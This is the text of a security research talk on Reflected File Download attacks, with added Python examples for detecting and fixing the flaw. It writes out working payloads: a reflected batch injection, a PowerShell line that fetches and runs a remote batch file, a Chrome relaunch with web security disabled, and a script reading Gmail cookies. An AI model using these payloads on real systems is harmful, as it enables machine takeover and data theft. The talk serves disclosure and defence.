Eu 14 Hafif: Reflected File Download, A New Web Attack Vector


Reflected File Download

A New Web Attack Vector

Oren Hafif
Security Researcher
Trustwave Spiderlabs
Download executable files from Google.com & Bing.com.
File executes, no warnings, and gains control over the machine.
Reflected File Download

RFD is a web attack vector that enables attackers to gain complete control over a victim’s machine by virtually downloading a file from a trusted domain.
Get your hands on that whitepaper!
@orenhafif
@spiderlabs
blog.spiderlabs.com
2 ½ Months Ago…
Security Professionals (image: http://thechive.com/2009/02/14/these-people-exist-part-3-25-photos/)
Two Major Conferences, every summer in Vegas: Black Hat, and a competing conference
Security Professionals: That’s Me!
Wow! It is scary!
Reflected File Download uses the dark side of the force!
There is nothing more joyful for a security professional…
…than being told that you are RIGHT by other security professionals!
Agenda
• Objectives
• Understand RFD
– What?
– Why?
– How?
• Advanced Exploitation
Agenda - What is RFD?
• DEMO!
• Analysis of the demo
Agenda – Why RFD?
• Motivation
• RFD exploitation capabilities and implications
• Trust Model for web downloads
Agenda – How RFD?
• How to Detect?
• How to Exploit?
• How to Prevent?

[ ] #78 – add cat pictures to slides


About Myself…
> Age.round(28)=30
> Age.round(27)=25
OBJECTIVES
BREAKERS: detect and report RFD issues
DEFENDERS: prevent and block RFD attacks
BUILDERS: develop secure APIs and web apps
DEMO: Windows Calculator
Demo: Let’s talk about it…
• User clicked on a valid link to Google.com
• A malicious file got downloaded from Google.com
• The file executes immediately, once clicked.
• Windows calculator popped up (Pwned)!
No upload takes place…
A file is being downloaded…

Uploadless Downloads!
RFD Implications (Why?)
• Gain full control over the user’s machine
• Confidentiality – steal everything, install trojans
• Availability – delete everything, use cryptolockers
• Integrity – impersonate the user/website.

• Chrome: Get back into the Browser with Super Powers.


HOW DO WE TRUST DOWNLOADS?
The Web Model of Trust
How do we trust downloads? Which one would you trust?
WHAT MAKES YOU TRUST A DOWNLOAD?
Referrer: 19%
Host: 81%
4 OUT OF 5 WOULD TRUST DOWNLOADS BASED ON THE HOSTING DOMAIN
RFD uses such trust to do evil!


RFD REAL EXAMPLE, STEP BY STEP…
Google Autocomplete (image: http://googlefails.tumblr.com/)

User -> Web Server: https://google.com/s?q=rfd
Web Server -> User:
HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd","I love rfd"]}
User -> Web Server: https://google.com/s?q=rfd"
Web Server -> User:
HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd\"","I love rfd"]}
It’s all about the context…
User -> Web Server: https://google.com/s?q=rfd"||calc||
Web Server -> User:
HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd\"||calc||","I love rfd"]}

How cmd.exe reads that line (backslash is not an escape character for cmd, so the quote after rfd\ closes the string):
{"results":["q", "rfd\"   -> FALSE (not a recognized command)
|| calc                   -> TRUE (calc runs, because the left side failed)
|| ","I love rfd"]}       -> IGNORED (the left side succeeded)
User -> Web Server: https://google.com/s;/setup.bat;?q=rfd"||calc||
Web Server -> User (saved as Setup.bat):
HTTP/1.1 200 OK
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd\"||calc||","I love rfd"]}
How come there are no warnings?
WINDOWS 7 SECURITY FEATURE BYPASS
• Windows 7 bypass for batch files
• Works for the “.bat” and “.cmd” extensions.
• Completely disables all warnings!
• Files execute immediately
It’s all in the filename!
• setup
• install
• update
VeryVeryBadUpdate.bat
RFD REQUIREMENTS
• REFLECTED – some input is reflected into the response body (shell commands, in the attacker’s case).
• FILE – the attacker can tamper with the filename.
• DOWNLOAD – the response is downloaded.
Where can we find RFD?
• Any response with reflected input and a less common Content-Type.
• JSON APIs and JSONP are extremely vulnerable.
• URL mapping is permissive (‘/’ , ‘;’)
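An added example, not from the slides or Trustwave: a Python sketch of the “it’s all about the context” parse shown above and of the three requirements just listed. cmd.exe toggles quote mode on every double quote and does not treat backslash as an escape, so the escaped rfd\" in the JSON ends the quoted region and the || after it becomes an operator, while the same line with \u0022 stays one quoted blob. The exit-status model (unknown program fails, md without a name fails), the KNOWN_COMMANDS set, and the sample bodies and headers are constructed here for illustration; redirects, caret escapes and the ‘/’ wildcard mapping test are not modelled.

```python
# Added illustration (not from the slides or Trustwave): a simplified model of
# how cmd.exe reads one line of a downloaded .bat file, used to check the
# REFLECTED requirement, plus header checks for FILE and DOWNLOAD.
# cmd.exe has no backslash escape: each double quote toggles "quoted" mode and
# the operators below only act outside quotes. Redirects (> <), the caret
# escape and variable expansion are deliberately not modelled.
OPERATORS = ("||", "&&", "|", "&")        # longest first, so "||" wins over "|"
KNOWN_COMMANDS = {"calc", "start", "taskkill", "powershell", "md"}   # assumed PATH


def cmd_segments(line):
    """Split one batch line into [(operator_before, command_text), ...]."""
    segments, current, op, quoted, i = [], "", "", False, 0
    while i < len(line):
        if line[i] == '"':
            quoted = not quoted
        elif not quoted:
            matched = next((o for o in OPERATORS if line.startswith(o, i)), None)
            if matched:
                segments.append((op, current.strip()))
                current, op, i = "", matched, i + len(matched)
                continue
        current += line[i]
        i += 1
    segments.append((op, current.strip()))
    return segments


def would_succeed(command):
    """Crude exit-status model: an unknown program fails ('... is not recognized
    as an internal or external command'), md without a directory name fails,
    anything else in KNOWN_COMMANDS succeeds."""
    tokens = command.split()
    if not tokens or tokens[0].lower() not in KNOWN_COMMANDS:
        return False
    return not (tokens[0].lower() == "md" and len(tokens) == 1)


def simulate(line):
    """Commands cmd.exe would run for one line: after || the right side runs
    only if the left side failed, after && only if it succeeded; & and | run
    both sides, and a pipeline's status is that of its last command."""
    ran, last_ok = [], False
    for op, command in cmd_segments(line):
        if (op == "||" and last_ok) or (op == "&&" and not last_ok):
            continue                     # skipped; the status stays as it was
        ran.append(command)
        last_ok = would_succeed(command)
    return ran


def injected_commands(body, payload):
    """Commands that would run and that came from the reflected payload."""
    return [c for c in simulate(body) if c and c in payload]


def rfd_preconditions(url_path, headers, body, payload):
    """The three requirements from the slides, evaluated on one response.
    Permissive mapping is reduced to a ';' path parameter here; '/' wildcard
    mappings have to be probed with extra requests."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    disposition = h.get("content-disposition", "")
    ctype = h.get("content-type", "").split(";")[0].strip()
    return {
        "reflected": bool(injected_commands(body, payload)),
        "file": ";" in url_path and "filename=" not in disposition,
        # without an attachment header the browser decides by type (and Chrome
        # and Opera honour <a download> anyway), so only text/html counts as safe
        "download": disposition.startswith("attachment") or ctype != "text/html",
    }


# Constructed samples shaped like the autocomplete responses on the slides.
PAYLOAD = 'rfd"||calc||'
VULNERABLE_BODY = r'{"results":["q", "rfd\"||calc||","I love rfd"]}'    # quote escaped as \"
ENCODED_BODY = r'{"results":["q", "rfd\u0022||calc||","I love rfd"]}'   # quote encoded as \u0022
VULNERABLE_HEADERS = {"Content-Type": "application/json;", "Content-Disposition": "attachment"}
FIXED_HEADERS = {"Content-Type": "application/json",
                 "Content-Disposition": "attachment; filename=1.txt",
                 "X-Content-Type-Options": "nosniff"}

if __name__ == "__main__":
    for body in (VULNERABLE_BODY, ENCODED_BODY):
        print(simulate(body))
    print(rfd_preconditions("/s;/setup.bat;", VULNERABLE_HEADERS, VULNERABLE_BODY, PAYLOAD))
    print(rfd_preconditions("/s;/setup.bat;", FIXED_HEADERS, ENCODED_BODY, PAYLOAD))
```

Feed it the raw response body and the exact payload that was sent; an empty injected_commands list together with a filename= attribute in Content-Disposition is the state the fix list later in this deck aims for. The same simulate() run over the taskkill/md/start chrome line from the Chrome exploit reproduces the eight-step breakdown given there.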
Which Exploit Should I Use?
• Use “.bat” and “.cmd” extensions for batch.
• Use “.js”, “.jse”, “.vbs”, “.wsh”, “.vbe”, “.wsf”, “.hta” for Windows Script Host fun.
• You can exploit other programs! E.g. “.pdf”
Batch tricks
• & - Command separator
• && - AND (the right side runs only if the left side succeeded)
• | - Pipe output into the next command
• || - OR (the right side runs only if the left side failed)
• > < >> << - Stream redirects
• New line
Force files to DOWNLOAD?
• Content-Disposition headers
• Chrome & Opera can force downloads using <a download href="http://target/setup.bat">
• Different browser behavior! (Content-Types)
ADVANCED EXPLOITATION
• Do as you wish… you are running commands in the OS.
• Use PowerShell to download the rest of the payload! (You can even ask for admin rights)
"||powershell (New-Object Net.Webclient).DownloadFile("http://pi.vu/B2jC","5.bat")|md||start /min 5

• Get back to Chrome with Super Powers!
How many command-line options does Google Chrome have? OVER NINE HUNDREEEEDD!
Let’s use just 2 out of 973…
• --disable-web-security: shuts down the same-origin policy!
• --disable-popup-blocking: well…
• Result: one big mess! YOU OWN CHROME!
Exploit chain, step by step:
1 User opens http://www.google.com/s;/ChromeSetup.bat;?q=payload&...
2 The Google web server replies and the browser saves the response as ChromeSetup.bat
3 The user runs the Windows batch file
4 The batch file restarts Chrome with the attacker’s flags
5 Chrome opens http://attacker-website.com/
6 The attacker’s page runs with the same-origin policy disabled:
<script>
win = open("http://mail.google.com");
alert(win.document.body); // granted
alert(win.document.cookie); // granted
</script>
Let’s create an exploit!
The reflected autocomplete response, with its numbered pieces explained below:
["\"||taskkill /F /IM ch*|md||start chrome pi.vu/B2jj --disable-web-security --disable-popup-blocking||",[],{"t":{"bpc":false,"tlw":false},"q":"Xwxg4gmQoA9Zn6E2DjScDWXRzbQ"}]

1 ["\" – Result: '["\"' is not recognized as an internal or external command, operable program or batch file.
2 || – the OR operator; since the left-hand side failed, the right-hand side is executed.
3 taskkill /F /IM ch* – kills all tasks with names starting with “ch”, targeting “chrome.exe”. Chrome will be closed.
4 | – pipes the output into the next command.
5 md – creates new directories; its only use here is to fail (no directory name is given), so the expression is false.
6 || – the same trick as before, continuing execution since the last expression was false.
7 start chrome … – starts Chrome at the attacker’s URL without web security and popup blocking.
8 || – this time Chrome was started successfully, so the rest of the line is ignored.
DEMO: Stealing emails from GMAIL
DEMO: Cross-Social Network RFD Worm
How to Fix RFD?
• Use exact URL mapping – no wildcards!
• Do not escape! Encode! Reflect a quote as \u0022 or \x22, never as \"
• Add Content-Disposition with a filename attribute:
Content-Disposition: attachment; filename=1.txt
• Require custom headers for all APIs
• If possible use CSRF tokens
How to Fix RFD - more?
• Whitelist callbacks – they are reflected by default!
• Enforce XSSI mitigation like for(;;);
• Never include user input in API usage errors.
• Remove support for path parameters (semicolons)
• X-Content-Type-Options: nosniff
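One way to build an autocomplete-style endpoint to the fix list above, as an added example (not Google’s or Trustwave’s code): the /s route, the XMLHttpRequest header convention, the 1.txt filename and the callback pattern are assumptions. Encoding the quote as \u0022 keeps the JSON valid while leaving cmd.exe no quote to toggle; the exact route kills the ;/setup.bat; trick; the filename attribute chooses the download name before the attacker can; the custom-header check, callback allowlist, XSSI prefix and input-free error bodies cover the rest of the list.

```python
import json
import re

# Added example (not Google's or Trustwave's code): a JSON API endpoint built
# to the slides' fix list. Route, header names, the 1.txt filename and the
# callback allowlist pattern are assumptions for illustration.
EXACT_ROUTES = {"/s"}                                          # exact mapping, no wildcards
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$.]{0,63}$")  # JSONP callback allowlist
XSSI_PREFIX = "for(;;);"


def encode_json(value):
    """json.dumps escapes a double quote as backslash-quote, which cmd.exe still
    reads as a quote toggle (backslash is not an escape for cmd). Re-encode it
    as \\u0022: still valid JSON, but no raw quote from user data reaches the
    body. The regex consumes escape sequences as pairs, so an escaped backslash
    followed by a closing quote is left alone."""
    dumped = json.dumps(value, ensure_ascii=True)
    return re.sub(r'\\(.)', lambda m: r'\u0022' if m.group(1) == '"' else m.group(0), dumped)


def base_headers(content_type="application/json"):
    """Headers that neutralise the FILE and DOWNLOAD requirements: the server
    fixes the download name and a harmless extension, and nosniff stops the
    browser from guessing another type."""
    return {
        "Content-Type": content_type + "; charset=utf-8",
        "Content-Disposition": "attachment; filename=1.txt",
        "X-Content-Type-Options": "nosniff",
    }


def build_response(query, callback=None, request_headers=None):
    """Return (status, headers, body). Error bodies never echo user input."""
    hdrs = {k.lower(): v for k, v in (request_headers or {}).items()}
    # A navigation (address bar, <a download>) cannot send a custom header,
    # so the JSON is only served to the page's own XHR code.
    if hdrs.get("x-requested-with") != "XMLHttpRequest":
        return 403, base_headers(), encode_json({"error": "missing X-Requested-With"})
    if callback is not None and not CALLBACK_RE.match(callback):
        return 400, base_headers(), encode_json({"error": "callback not allowed"})
    body = encode_json({"results": ["q", query, "I love rfd"]})
    if callback:
        return 200, base_headers("application/javascript"), f"{callback}({body});"
    return 200, base_headers(), XSSI_PREFIX + body     # clients strip the prefix first


def handle(path, query, callback=None, request_headers=None):
    """Dispatch on the exact path only: '/s;/setup.bat;' and '/s/' are 404s,
    so the URL cannot be used to pick the download name."""
    if path not in EXACT_ROUTES:
        return 404, base_headers(), encode_json({"error": "not found"})
    return build_response(query, callback, request_headers)


def decode_body(body):
    """Client side: strip the XSSI prefix, then parse the JSON."""
    if not body.startswith(XSSI_PREFIX):
        raise ValueError("unexpected response")
    return json.loads(body[len(XSSI_PREFIX):])


if __name__ == "__main__":
    xhr = {"X-Requested-With": "XMLHttpRequest"}
    print(handle("/s;/setup.bat;", 'rfd"||calc||', request_headers=xhr))
    print(handle("/s", 'rfd"||calc||', request_headers=xhr))
    print(handle("/s", 'rfd"||calc||'))
```

The quote count of the hardened body never changes with the input (eight quotes for this template whatever the query contains), which is exactly the property cmd.exe needs to see before || can escape the string.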
Summary
• Your site can be used to attack users!
• Attackers get full control of the victim’s machine.
• A file is downloaded without being uploaded.
• Advanced exploitation (Chrome/PowerShell) and bypasses (Windows).
• Fix it! I am so scared!
Who is responsible?
“We recognize that the address bar is the only
reliable security indicator in modern browsers.”

The Google Vulnerability Reward Program Rules


THANK YOU!
Follow Me: @orenhafif
Follow Us: @spiderlabs
